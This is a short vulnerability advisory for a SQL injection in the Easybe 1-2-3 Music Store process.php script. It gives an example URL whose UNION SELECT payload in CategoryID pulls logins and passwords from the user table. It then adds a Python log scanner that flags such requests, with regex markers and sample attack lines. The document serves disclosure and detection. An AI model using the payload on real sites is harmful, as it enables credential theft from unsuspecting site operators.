Easybe 1-2-3 Music Store Process.PHP Script SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example was provided:

http://www.example.com/123music-path/process.php?pname=ShowAlbumProcess-Start&CategoryID=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/concat(0x31203C666F6E7420636F6C6F723D7265643E,login,0x3a,passwd,0x3C2F666F6E743E)/**/from/**/user/*
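
A log check for the request pattern shown above, as an added example that is not part of the original advisory: it flags requests to process.php whose CategoryID value is not a plain integer. The combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Client address and request target from a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL fragments of the kind the advisory's example URL places in CategoryID.
SQL_MARKERS = re.compile(r"/\*|\b(?:union|select|from)\b|concat\s*\(|0x[0-9a-f]{4,}", re.I)

def suspicious_category_ids(target):
    """Return the CategoryID values in a process.php request that are not plain integers."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/process.php"):
        return []
    bad = []
    for value in parse_qs(parts.query, keep_blank_values=True).get("CategoryID", []):
        decoded = unquote(value)  # parse_qs decoded once; decode again for double encoding
        if not re.fullmatch(r"[0-9]+", decoded):
            bad.append(decoded)
    return bad

def scan(lines):
    """Return (line number, client, value, has SQL markers) for each flagged request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client, target = match.groups()
        for value in suspicious_category_ids(target):
            findings.append((number, client, value, bool(SQL_MARKERS.search(value))))
    return findings

# Constructed sample log lines (not from the advisory); the addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /123music-path/process.php?pname=ShowAlbumProcess-Start&CategoryID=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2010:10:00:05 +0000] "GET /123music-path/process.php?pname=ShowAlbumProcess-Start&CategoryID=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/1/* HTTP/1.1" 200 5340',
    '198.51.100.7 - - [01/Jan/2010:10:00:09 +0000] "GET /123music-path/process.php?pname=ShowAlbumProcess-Start&CategoryID=1%2520UNION%2520SELECT%25201 HTTP/1.1" 200 5340',
    '192.0.2.10 - - [01/Jan/2010:10:00:12 +0000] "GET /123music-path/index.php?CategoryID=abc HTTP/1.1" 200 900',
    '192.0.2.11 - - [01/Jan/2010:10:00:15 +0000] "GET /123music-path/process.php?pname=ShowAlbumProcess-Start&CategoryID=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, client, value, sql in scan(SAMPLE_LOG):
        print(f"line {number} {client} CategoryID={value!r} sql_markers={sql}")
```

A non-integer CategoryID without SQL markers (the last sample line) is still reported, since any such value is worth reviewing against this script.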


 

Copyright 2010, SecurityFocus